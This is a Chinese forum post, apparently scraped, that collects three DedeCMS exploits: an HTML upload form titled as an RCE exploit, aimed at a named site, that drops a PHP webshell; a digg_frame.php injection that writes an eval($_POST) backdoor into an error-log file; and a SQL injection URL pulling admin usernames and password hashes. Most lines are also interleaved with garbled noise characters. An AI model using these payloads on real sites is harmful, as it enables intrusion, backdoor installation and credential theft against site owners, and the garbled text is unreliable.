' e/ u8 W! @4 P+ A  O
. Z! ]: n6 v7 I3 O( Y6 _2 B: x

# Y; ^( X( Z+ e( {# a& Q  g& ?9 L
8 q4 t& S4 S$ a4 |6 J- G! m1 t! @
. s6 {" l) _  b; i8 Z  k: B
2 R2 i- |8 u2 ?% {5 T4 t0 j, a; G. s" K0 N+ C3 I& C

2 h! S- k) C3 s* F4 }6 M6 d  y% S1 R5 r( E
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞" h  _0 X* D+ q4 n7 K: t
<html>
7 ]* S- G8 E; H) V<head>  R9 L; y1 @% Q  q# `- u8 {
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
( x* h4 G2 a3 J7 o9 b; B</head>
8 Y& M. {  A3 ~/ z<body style="FONT-SIZE: 9pt">
- @5 a8 Z/ Q1 [7 i5 H6 r( c0 m7 W' J---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
$ z- L" ?8 Y: g! O5 q) g<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
) C1 C: U- D5 ~# b7 E. Q) F8 e% F<input type='hidden' name='activepath' value='/data/cache/' />; B" M% X* }! w- m2 k; t2 J
<input type='hidden' name='cfg_basedir' value='../../' />
, s( ?6 k5 B2 Q: |1 T& ^+ y8 p<input type='hidden' name='cfg_imgtype' value='php' />
* v* `& d# Z5 m/ Z<input type='hidden' name='cfg_not_allowall' value='txt' />& U& `4 D8 S; t+ Q( h) D8 @( A" g
<input type='hidden' name='cfg_softtype' value='php' />
  b  e$ ]4 j5 d0 Z. f<input type='hidden' name='cfg_mediatype' value='php' />
6 I' f% K1 l4 @$ G$ R0 {. q' D<input type='hidden' name='f' value='form1.enclosure' />
$ F: u  D+ W3 Z9 L, {: \<input type='hidden' name='job' value='upload' />
& g$ S) s7 n& I3 @# I<input type='hidden' name='newname' value='fly.php' />
( \' _, u5 i0 ]5 g. E, q( M7 }, ESelect U Shell <input type='file' name='uploadfile' size='25' />* Y1 e4 b8 B, {8 @
<input type='submit' name='sb1' value='确定' />
/ Z! F) E% M& v5 Q( W1 s  |</form>
+ S6 B* l8 d2 W  p, m<br />It's just a exp for the bug of Dedecms V55...<br />: F; h8 r# q9 ?7 z. a; x
Need register_globals = on...<br />
  H* \6 ]& u! B0 a" ]Fun the game,get a webshell at /data/cache/fly.php...<br />
! g3 ?. i# U: Y</body>' M0 ~( ^& ?& _! r  l) P. x4 }
</html>, s4 w5 m3 p) D/ p1 [

: @' D8 Z8 E9 M! O' P1 ~
1 t' u% |5 X* q- @  E; D/ y
- U/ M. y2 h: Y7 z- s# E7 e* r- b4 [8 h- K

; u% b4 {, Y/ Y, t" r6 e, |
  c) c( W5 ~" b- O2 j4 H* t7 y! X2 E4 T8 J! V" J' J2 j/ t

) z5 O! J4 i0 W; a( p1 s3 D( |& P. g0 C- M" ?2 W2 g% ^
2 ~5 O& O; ]3 x
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞9 W' ?! j, o1 Z3 ^2 E
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
+ L  ?" }, W8 F. W1. 访问网址:
) G- n! L4 \9 O5 L* Z
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
( ^* I- o/ |2 a9 {" L可看见错误信息6 R# s4 W: M' Y" z/ F1 j
6 [+ q2 z6 ^. N

  |5 f& \+ H! r8 s1 O2. 访问
http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
* H; {& [$ l8 R9 H( yint(3) Error: Illegal double '1024e1024' value found during parsing& @/ Q, [5 N6 u; j" C( f
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>" I: q* V+ v7 m" g3 [& `
2 j% c! O( G. j/ f- |+ o) t
5 T, I& A8 S7 A# ]6 [0 {3 e
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是  m- z% `9 `$ b  ]! T

  D- K) |. P. u  E( f, Q$ r
) q0 x- E& V3 y# |3 K<form action=”
http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
  Z' t. |9 Q4 U$ E9 G7 H0 l( j& K. \# {- ~" X& r1 a! f
( F, O( L- X$ H& [# l' Z
按确定后的看到第2步骤的信息表示文件木马上传成功.
0 u6 R$ p+ I7 Q- Q$ ^" r9 k- c4 R4 M4 ^
# C" U9 w. O1 q2 Q/ j. T7 D
  Q- U; D) b* ]4 n7 R, j. B/ ~

' D7 p  L, M, v! x% P* p( z; s0 t0 }4 i
* q) [: r& l4 E+ w& T) B

& {9 ~" a$ b' h$ W
, E1 B7 v+ F. C- @3 S% I$ M. X$ N5 W. A

) j$ v; w1 R2 Y9 b/ E2 D
7 V+ j1 x: Y4 B% p5 j# X7 K: x' L9 k- Z/ X7 `( k! q' W
织梦(DedeCms)plus/infosearch.php 文件注入漏洞
% }( n2 W6 B5 }8 _4 @http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表